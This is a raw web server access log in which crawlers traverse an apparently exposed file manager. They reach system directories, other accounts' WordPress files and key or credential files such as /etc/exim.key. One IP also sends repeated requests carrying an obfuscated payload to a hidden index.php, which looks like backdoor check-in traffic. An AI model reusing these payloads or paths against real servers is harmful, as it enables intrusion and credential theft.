216.73.217.176 - - [19/May/2026:15:40:44 +0100] "GET /?path=%2F%2Fhome%2Fsocialservicedep HTTP/2" 200 2635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:45 +0100] "GET /view/item/064509661 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:47 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Ffonts HTTP/2" 200 3378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:48 +0100] "GET /view/item/0645108384 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
199.47.82.19 - - [19/May/2026:15:40:51 +0100] "GET /view/item/0645117771 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:51 +0100] "GET /?fileloc=%2F%2Fsbin%2Faugenrules&path=%2F%2Fsbin HTTP/2" 200 4215 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:38:52 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353133322p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313533322q6435616134396230373431386634623464626332613666353431383439613962222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:40:53 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fcontact-form-7%2Flanguages HTTP/2" 200 2970 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:54 +0100] "GET /view/item/0645124988 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:56 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Fadmin-header.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 5659 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:40:57 +0100] "GET /view/item/0645159988 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:40:59 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgroupadd&path=%2F%2Fsbin HTTP/2" 200 26197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:00 +0100] "GET /view/item/0645161254 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:02 +0100] "GET /?fileloc=%2F%2Fsbin%2Fswaplabel&path=%2F%2Fsbin HTTP/2" 200 7927 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:03 +0100] "GET /view/item/064518204 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
66.249.70.97 - - [19/May/2026:15:41:03 +0100] "GET /view/item/172294715046 HTTP/1.1" 200 26338 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:41:05 +0100] "GET /?fileloc=%2F%2Fetc%2Fidmapd.conf&path=%2F%2Fetc HTTP/2" 200 4783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:06 +0100] "GET /view/item/0645220211 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:08 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2Fessential-addons-elementor HTTP/2" 200 3849 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:09 +0100] "GET /view/item/0645221071 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:11 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fcontact-form-7%2Fincludes HTTP/2" 200 4085 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:12 +0100] "GET /view/item/06452211 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
51.79.186.0 - - [19/May/2026:15:39:14 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353135342p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313535342q3434643330303933366332306633353465656430656362343431386564323561222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:41:14 +0100] "GET /?path=%2Fhome%2Fedudeptncgov HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:15 +0100] "GET /view/item/0645230442 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:17 +0100] "GET /?path=%2F%2Fhome%2Fparabizl HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:18 +0100] "GET /view/item/0645253961 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:20 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus%2Findex.html&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus HTTP/2" 200 4556 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:21 +0100] "GET /view/item/0645271891 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:24 +0100] "GET /?path=%2Fhome%2Fgulfshin HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:24 +0100] "GET /view/item/0645288133 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:26 +0100] "GET /?path=%2F%2Fhome%2Fcoopminncgov HTTP/2" 200 2631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:15:41:26 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/034045211455 HTTP/1.1" 200 26927 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.47.82.19 - - [19/May/2026:15:41:27 +0100] "GET /view/item/0645297536 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:30 +0100] "GET /?path=%2Fhome%2Faaruthirumurugan HTTP/2" 200 2634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:30 +0100] "GET /view/item/0645307345 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:32 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Ftablepress%2Ftablepress.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Ftablepress HTTP/2" 200 4481 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:33 +0100] "GET /view/item/0645314184 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
199.47.82.19 - - [19/May/2026:15:41:36 +0100] "GET /view/item/0645331270 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
51.79.186.0 - - [19/May/2026:15:39:36 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353137362p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313537362q6435323236313961383636343030336135636562326565656362323832636237222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
199.47.82.19 - - [19/May/2026:15:41:39 +0100] "GET /view/item/064533180 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:40 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2F.cpanel%2Fcaches%2Fdynamicui HTTP/2" 200 2945 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:42 +0100] "GET /view/item/0645332130 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:44 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket%2Fwp-rocket.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket HTTP/2" 200 4762 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:45 +0100] "GET /view/item/0645350482 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:48 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2F2026 HTTP/2" 200 3162 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:48 +0100] "GET /view/item/0645375251 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
66.249.70.110 - - [19/May/2026:15:41:49 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/033652100543 HTTP/1.1" 200 26572 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.47.82.19 - - [19/May/2026:15:41:51 +0100] "GET /view/item/0645392759 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:52 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2F2023 HTTP/2" 200 3061 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:54 +0100] "GET /view/item/0645400036 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:41:56 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2Frevslider HTTP/2" 200 3068 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:41:57 +0100] "GET /view/item/0645427353 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
51.79.186.0 - - [19/May/2026:15:39:58 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353139382p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313539382q3238346365323062393832656235373864386662363461643431343136313138222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:41:59 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2Fwp-file-manager-pro HTTP/2" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:42:00 +0100] "GET /view/item/0645460681 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:42:02 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2F2019 HTTP/2" 200 3020 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:42:03 +0100] "GET /view/item/0645470928 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:42:05 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 3072 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:42:06 +0100] "GET /view/item/0645503396 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:42:08 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2Felementor HTTP/2" 200 3121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:42:09 +0100] "GET /view/item/064551532 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:42:11 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2Fthemeisle-gutenberg HTTP/2" 200 2959 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.47.82.19 - - [19/May/2026:15:42:12 +0100] "GET /view/item/064551954 HTTP/1.1" 200 4111 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
216.73.217.176 - - [19/May/2026:15:42:14 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-navigation-fallback.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 4904 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.97 - - [19/May/2026:15:42:13 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/072179408898 HTTP/1.1" 200 26906 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.186.0 - - [19/May/2026:15:40:20 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353232302p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313632302q3932326538353037353730323265316163363036353635633438656138356562222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:42:20 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fimages HTTP/2" 200 4219 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:22 +0100] "GET /?fileloc=%2F%2Fsbin%2Fexinext&path=%2F%2Fsbin HTTP/2" 200 6110 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:25 +0100] "GET /?fileloc=%2F%2Fsbin%2Fwipefs&path=%2F%2Fsbin HTTP/2" 200 14270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:28 +0100] "GET /?path=%2Fhome%2Fnagooran HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:31 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdnssec-cds&path=%2F%2Fsbin HTTP/2" 200 19181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:34 +0100] "GET /?path=%2Fhome%2Fsahasra1 HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:37 +0100] "GET /?fileloc=%2F%2Fetc%2Ffilesystems&path=%2F%2Fetc HTTP/2" 200 2609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.96 - - [19/May/2026:15:42:38 +0100] "GET /view/item/134004148429 HTTP/1.1" 200 26505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:42:40 +0100] "GET /?fileloc=%2F%2Fsbin%2Fiptables-nft&path=%2F%2Fsbin HTTP/2" 200 88665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:40:42 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353234322p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313634322q3263663664656439396266623634386564666234333439373735373361623032222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:42:43 +0100] "GET /?fileloc=%2F%2Fsbin%2Fservice&path=%2F%2Fsbin HTTP/2" 200 4080 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:47 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-url-pattern-prefixer.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 4240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:50 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Fasync-upload.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 4673 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:53 +0100] "GET /?fileloc=%2F%2Fetc%2Frecent_authed_mail_ips_users&path=%2F%2Fetc HTTP/2" 200 3392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:56 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fthemes HTTP/2" 200 3262 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:42:59 +0100] "GET /?fileloc=%2F%2Fetc%2Fpasswd.nouids.cache&path=%2F%2Fetc HTTP/2" 200 2574 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:02 +0100] "GET /?fileloc=%2F%2Fetc%2Fsubuid-&path=%2F%2Fetc HTTP/2" 200 2581 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:15:43:03 +0100] "GET /collect/12853994667 HTTP/1.1" 200 26524 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:43:05 +0100] "GET /?fileloc=%2F%2Fetc%2Flock_manager_local.ini&path=%2F%2Fetc HTTP/2" 200 2932 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:41:04 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353236342p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313636342q3936656430326462623430336235346630626634323031643431316661623538222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:43:08 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgdisk&path=%2F%2Fsbin HTTP/2" 200 79100 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:11 +0100] "GET /?fileloc=%2F%2Fetc%2Fexim.key&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:14 +0100] "GET /?fileloc=%2F%2Fsbin%2Fcgdisk&path=%2F%2Fsbin HTTP/2" 200 66186 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:17 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpoweroff&path=%2F%2Fsbin HTTP/2" 200 107312 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:20 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmariadbd&path=%2F%2Fsbin HTTP/2" 200 7067531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:26 +0100] "GET /?path=%2F%2Fhome%2Fnagooran HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:41:26 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353238362p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313638362q3931393132396136373737376436646566623031666339353864643266343035222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
66.249.71.174 - - [19/May/2026:15:43:28 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/033665982807 HTTP/1.1" 200 27163 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:43:29 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fassets%2Fscript-modules-packages.min.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fassets HTTP/2" 200 3041 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:32 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffsck.minix&path=%2F%2Fsbin HTTP/2" 200 22062 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
